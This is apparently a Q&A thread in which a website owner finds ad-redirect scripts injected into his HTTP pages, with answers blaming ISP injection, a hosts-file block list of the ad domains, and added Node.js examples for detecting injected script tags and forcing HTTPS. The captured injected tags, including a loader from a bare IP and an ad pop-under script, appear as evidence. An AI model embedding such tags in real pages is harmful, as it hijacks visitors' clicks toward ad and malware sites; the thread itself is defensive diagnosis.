aman

Reputation: 143

Unknown scripts are running and redirecting on click to unknown websites

Problem: Sometimes, on clicking a NAVBAR menu or any div on my Bootstrap website, it redirects to ads or unknown links in a new tab, something like this:

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

Imported links from the hosted file:

<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">

<script src="js/jquery.min.js"></script>
<script src="js/main.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>

<link rel="stylesheet" type="text/css" href="css\style.css">

<link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

<link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" crossorigin="anonymous">

<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap"></script>

What I got in inspection:

I checked my code multiple times when there was no redirect on clicking the menu. I found nothing suspicious. BUT THEN, when I got redirect links on click, I checked my code in the browser and I can clearly see a few script sources added to my files (visible in Inspection mode in browsers only). They are not written in my code. The unknown parts of my code are:

1) Here the following 2 scripts are replacing the script js/jquery.min.js in the head tag:

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2) This one is being added to the body tag right after where I imported the Google API:

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript"></script>
</span>

3) This one is also in the body tag:

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url('data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'); position: absolute; z-index: 2000;"></div>

4) On inspecting the redirect link, the HEADERS info:

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

What I have tried:

My code is clean and there is no script which is redirecting it somewhere. It may be my browser or Windows being compromised. I checked the website from 3 browsers, EDGE, CHROME and FIREFOX, and got the same problem. Then I upgraded to Windows 10 from Win7 and did a fresh install. But nothing happened. Then I thought of asking Hostgator support if the server is compromised; they replied it's okay from their end. I installed Malwarebytes and all the software to solve it, but they just notify that Chrome / Firefox / Edge is redirecting to an outbound ID with some domain name, mostly go.oclasrv.com, and do nothing.

ANY SOLUTION???

UPDATE:

I got a similar redirect on the Hostgator support feedback link.

On noticing, here the domain name in the string is replaced by rateus.in; zoneid=1492761 is the same whatever unsecured link I open. Also cb=xxxxxxxxxxxx and tm=xxxxxxxxxxx change for different links, and fingerprint=c2VwLW5vLXJlZGlyZWN0 is the same for all links I open.

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

My OS is completely upgraded to Win10 Pro and I have installed only Chrome without any plugins.

The problem is browser independent, as I got the same results on Edge and Firefox.

ANY JS EXPERT WHO CAN HELP ME OUT HERE

Upvotes: 13

Views: 3661
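What the question describes is recognisable from the served HTML alone: a script tag whose source is a bare IP address and port, a `getjs?nadipdata=` loader, a `fingerprint=` token appended to the site's own jQuery URL, and an `apu.php?zoneid=` ad loader inside a `<span id="notiMain">`. The following is an added example, not code from the original post: a small Node.js audit that pulls every `<script src>` out of an HTML string and flags the ones that are not from the page's own origin or an allowlisted CDN, or that match those patterns. The allowlist is taken from the `<head>` the question shows; the sample HTML is constructed here from the question's snippets (one long query string is shortened). Feeding it the HTML as received by the browser, rather than the file on disk, is the point, since the file on disk is clean.

```javascript
// Added example (not from the original post): audit <script src> tags in a
// page's served HTML for signs of the in-transit injection described above.
// Regex-based so it needs no DOM library; it handles script tags, not
// arbitrary HTML.

// Origins the site intentionally loads from, taken from the <head> in the
// question. Anything else that is not the page's own origin is flagged.
const ALLOWED_ORIGINS = new Set([
  'https://maxcdn.bootstrapcdn.com',
  'https://fonts.googleapis.com',
  'https://use.fontawesome.com',
  'https://maps.googleapis.com',
]);

// URL patterns seen in the injected tags posted in the question.
const INJECTION_PATTERNS = [
  /\/getjs\?nadipdata=/i,        // the loader served from the bare IP
  /[?&]fingerprint=/i,           // tracking token appended to the real jquery URL
  /\/a[pf]u\.php\?zoneid=/i,     // ad-network pop-under loader (apu.php / afu.php)
];

// Pull every <script ... src="..."> value out of an HTML string, in document order.
function extractScriptSrcs(html) {
  const out = [];
  const re = /<script\b[^>]*?\bsrc\s*=\s*(['"])(.*?)\1[^>]*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[2]);
  return out;
}

// Resolve one src against the page URL and list why it looks suspicious.
function classifyScript(src, pageUrl) {
  const page = new URL(pageUrl);
  // HTML-escaped ampersands (&amp;) must be unescaped before URL parsing.
  const url = new URL(src.replace(/&amp;/g, '&'), page);
  const findings = [];
  if (url.origin !== page.origin && !ALLOWED_ORIGINS.has(url.origin)) {
    findings.push('origin-not-allowlisted');
  }
  if (/^\d{1,3}(\.\d{1,3}){3}$/.test(url.hostname)) {
    findings.push('bare-ip-host'); // real CDNs are not addressed by raw IP
  }
  if (INJECTION_PATTERNS.some((p) => p.test(url.href))) {
    findings.push('known-injection-pattern');
  }
  return { src: url.href, findings };
}

// Audit a page: report whether it was fetched over plain HTTP (where an ISP can
// rewrite it at all) and which scripts look injected.
function auditPage(html, pageUrl) {
  return {
    insecureTransport: new URL(pageUrl).protocol === 'http:',
    suspicious: extractScriptSrcs(html)
      .map((s) => classifyScript(s, pageUrl))
      .filter((r) => r.findings.length > 0),
  };
}

// Constructed sample reproducing the tags the question shows (the nadipdata
// query string is shortened); the first three tags are the site's own.
const SAMPLE_HTML = `
<script src="js/jquery.min.js"></script>
<script src="js/main.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%7D"&amp;screenheight=768&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>
<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>
<span id="notiMain"><script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript"></script></span>
`;

console.log(JSON.stringify(auditPage(SAMPLE_HTML, 'http://amans.xyz/'), null, 2));
```

Run against the sample, the three injected tags come back flagged and the site's own three do not. The `insecureTransport` flag is the one that matters for the root cause: every script on an `http://` page, including the first-party ones, can be replaced in transit, so the audit is a diagnostic, not a defence.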

Answers (7)

user17899479

Reputation: 1

Blocking this URL http://117.254.84.212:3000 in the router seems more effective.

Upvotes: 0

Debosmit Majumder

Reputation: 83

Adguard has fixed this, as referenced here, to block the clickjacking. The script can be seen in action in mobile browsers, opening new-tab advertisements.

Update your Adguard filters to the latest version to see.

Upvotes: 0

Netverse

Reputation: 1189

Simply block the URL (the BSNL IP injecting these ads) from your router's security section. For me the BSNL URL was http://117.254.84.212

Upvotes: 0

Nɪsʜᴀɴᴛʜ ॐ

Reputation: 2904

Good Catch!

BSNL servers have been corrupting or infecting users with malware/viruses day by day due to poor security.

naganoadigei.com was registered explicitly to serve malware and redirect users to phishing sites.

Recently, in February 2019, they had resolved the issue. But unfortunately a new type of ad-based redirect was found, humparsi.com, as of the month of February 2019.

You may have a look at whether the site has been infected or not by visiting Sucuri


Alternatively, you can block the outgoing requests on your own system with a DNS (hosts file) entry.

Navigate to %windir%\System32\drivers\etc, edit the hosts file in elevated mode / with admin authorization, and add these lines to your hosts file:

0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com

The above sites are not secured with SSL

To block a specific IP address, block outbound connections to it in the firewall.

In order to cut down the impact or any unlikely adverse effects, you can block the JavaScript by installing add-ons such as NoScript or ScriptSafe, and HTTPS Everywhere.

To find out which application uses the IP address with the port number assigned:

C:\Windows\system32>netstat -anob

Upvotes: 0

Jayson Chacko

Reputation: 2418

This seems to be a case of the ISP injecting JavaScript files. Are you by any chance on BSNL broadband? For the last few days, BSNL seems to have been injecting adware on HTTP (non-encrypted) sites.

The only solution I know is to host your site on https OR change your ISP.

Upvotes: 15
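The fix in this answer is to serve the site over HTTPS, which removes the ISP's ability to modify the page in transit. As an added example, not code from the answer or from the site in the question, here is a plain Node.js request handler that refuses to serve anything over HTTP: it redirects every cleartext request to the same URL on HTTPS, sets a Strict-Transport-Security header on the TLS responses so returning browsers never make the HTTP request at all, and validates the Host header so the redirect cannot be pointed at an attacker-chosen domain. The `trustProxy` option and the `X-Forwarded-Proto` handling are assumptions about a TLS-terminating proxy in front of the app; `makeFakeResponse` exists only to exercise the handler offline.

```javascript
// Added example (not from the answer above): force HTTPS on a Node.js server
// so an ISP that rewrites cleartext pages never gets a page to rewrite.
// Uses only the core http/https request and response API, no framework.

const HSTS_MAX_AGE = 31536000; // one year, in seconds

// True when the request arrived over TLS. Node marks TLS sockets with
// socket.encrypted. Behind a TLS-terminating proxy the app only sees plain
// HTTP, so X-Forwarded-Proto is honoured, but only when trustProxy is set:
// any client can send that header, so trusting it unconditionally would let
// an attacker skip the redirect.
function isSecureRequest(req, trustProxy) {
  if (req.socket && req.socket.encrypted) return true;
  if (!trustProxy) return false;
  const xfp = String(req.headers['x-forwarded-proto'] || '')
    .split(',')[0].trim().toLowerCase();
  return xfp === 'https';
}

// Build the request handler. allowedHosts guards the Host header: a redirect
// built from an unvalidated Host would send users to whatever host the
// request claimed (assumed list; use your own hostnames).
function enforceHttps({ allowedHosts, trustProxy = false }, next) {
  const hosts = new Set(allowedHosts);
  return function handle(req, res) {
    const host = (req.headers.host || '').toLowerCase();
    if (!hosts.has(host)) {
      res.writeHead(400, { 'Content-Type': 'text/plain' });
      res.end('Bad Host header');
      return;
    }
    if (!isSecureRequest(req, trustProxy)) {
      // Permanent redirect to the same path and query on HTTPS. Only a first
      // visit ever takes this hop; after that HSTS keeps the browser on TLS.
      res.writeHead(301, { Location: `https://${host}${req.url}` });
      res.end();
      return;
    }
    // Browsers only honour HSTS when it is received over HTTPS, which is why
    // it is set here and not on the redirect.
    res.setHeader('Strict-Transport-Security',
      `max-age=${HSTS_MAX_AGE}; includeSubDomains`);
    next(req, res);
  };
}

// Minimal stand-in for http.ServerResponse so the handler can be exercised
// without opening a socket. Only the methods used above are modelled.
function makeFakeResponse() {
  const res = { statusCode: 200, headers: {}, body: '', ended: false };
  res.setHeader = (name, value) => { res.headers[name.toLowerCase()] = value; };
  res.writeHead = (code, headers = {}) => {
    res.statusCode = code;
    for (const [name, value] of Object.entries(headers)) res.setHeader(name, value);
  };
  res.end = (chunk = '') => { res.body += chunk; res.ended = true; };
  return res;
}

// Demo: the application handler just serves a fixed page.
const app = enforceHttps(
  { allowedHosts: ['amans.xyz', 'www.amans.xyz'], trustProxy: false },
  (req, res) => { res.writeHead(200, { 'Content-Type': 'text/html' }); res.end('<p>ok</p>'); },
);

const plainReq = { url: '/index.html?x=1', headers: { host: 'amans.xyz' }, socket: {} };
const plainRes = makeFakeResponse();
app(plainReq, plainRes);
console.log(plainRes.statusCode, plainRes.headers.location); // 301 https://amans.xyz/index.html?x=1
```

On shared hosting such as the question's, the same two properties are normally configured in the web server (a rewrite rule for the redirect, a header directive for HSTS) rather than in application code, but the logic is identical. The one gap left is the very first cleartext request from a browser that has never seen the HSTS header; submitting the domain to the HSTS preload list closes it.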

David Chelliah

Reputation: 1349

If you see an unknown script injected from the following IPs, then it is the script file injected by the BSNL ISP.

61.0.245.90, 117.205.13.171

These scripts are injected only when you visit HTTP websites. HTTPS involves Transport Layer Security, so it cannot be tampered with by the ISP.

The script files from these IPs are just a conduit, which downloads further ad scripts from different ad media. Most of this ad media follows intrusive advertising by hijacking user mouse clicks to open their popups.

BSNL's excuse for such activity is that it is a feature to enhance the browsing experience for their subscribers. There is a detailed post written on BSNL injecting such scripts and how to stop those.

Upvotes: 0

Jake Chasan

Reputation: 6550

This issue that you are having is server-side. Likely nothing is wrong with your code, however the server is infected with malware injecting this bad code into your website.

To solve this, I would make a backup of the code you wrote, change your FTP hosting passwords, erase your server, and add your code back. If this does not solve the problem, then I would change hosting providers.

Upvotes: 1
